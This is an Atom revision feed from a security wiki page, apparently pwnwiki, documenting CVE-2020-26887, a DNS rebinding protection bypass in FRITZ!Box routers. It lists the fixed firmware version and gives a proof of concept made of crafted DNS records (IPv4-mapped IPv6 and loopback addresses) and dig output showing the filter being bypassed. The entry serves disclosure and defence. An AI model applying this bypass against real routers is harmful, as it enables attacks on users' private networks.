<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2020-26887_DNS_Rebinding_Protection%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E%2Fes</id>
	<title>CVE-2020-26887 DNS Rebinding Protection繞過漏洞/es - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2020-26887_DNS_Rebinding_Protection%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E%2Fes"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2020-26887_DNS_Rebinding_Protection%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E/es&amp;action=history"/>
	<updated>2026-04-08T00:07:12Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2020-26887_DNS_Rebinding_Protection%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E/es&amp;diff=5153&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;CVE-2020-26887 Vulnerabilidad de omisión de la Proteccion de Rebinding DNS&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2020-26887_DNS_Rebinding_Protection%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E/es&amp;diff=5153&amp;oldid=prev"/>
		<updated>2021-06-16T02:09:28Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;CVE-2020-26887 Vulnerabilidad de omisión de la Proteccion de Rebinding DNS&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
== Versión fija ==&lt;br /&gt;
&amp;gt;= 7.21&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Supposing the following resource records (RR) are configured for different&lt;br /&gt;
subdomains of example.com:&lt;br /&gt;
&lt;br /&gt;
------------------------------------------------------------------------&lt;br /&gt;
private.example.com        1  IN  A     192.168.178.20&lt;br /&gt;
local.example.com          1  IN  A     127.0.0.1&lt;br /&gt;
privateipv6.example.com.   1  IN  AAAA  ::ffff:192.168.178.20&lt;br /&gt;
------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
A DNS request to the FRITZ!Box router for the subdomain&lt;br /&gt;
private.example.com returns an empty answer, as expected:&lt;br /&gt;
&lt;br /&gt;
------------------------------------------------------------------------&lt;br /&gt;
$ dig private.example.com @192.168.178.1&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.11.5-P4-5.1+deb10u1-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; private.example.com @192.168.178.1&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;&amp;lt;- opcode: QUERY, status: NOERROR, id: 58984&lt;br /&gt;
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0&lt;br /&gt;
&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;private.example.com.	IN	A&lt;br /&gt;
------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
DNS requests for the subdomains privateipv6.example.com and&lt;br /&gt;
local.example.com return the configured resource records successfully,&lt;br /&gt;
effectively bypassing the DNS rebinding protection:&lt;br /&gt;
&lt;br /&gt;
------------------------------------------------------------------------&lt;br /&gt;
$ dig privateipv6.example.com @192.168.178.1 AAAA&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.11.5-P4-5.1+deb10u1-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; @192.168.178.1 privateipv6.example.com AAAA&lt;br /&gt;
; (1 server found)&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;&amp;lt;- opcode: QUERY, status: NOERROR, id: 6510&lt;br /&gt;
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;privateipv6.example.com.	IN	AAAA&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
privateipv6.example.com. 1	IN	AAAA	::ffff:192.168.178.20&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$ dig local.example.com @192.168.178.1&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.11.5-P4-5.1+deb10u1-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; local.example.com @192.168.178.1&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;&amp;lt;- opcode: QUERY, status: NOERROR, id: 28549&lt;br /&gt;
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;local.example.com.	IN	A&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
local.example.com. 1	IN	A	127.0.0.1&lt;br /&gt;
------------------------------------------------------------------------&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>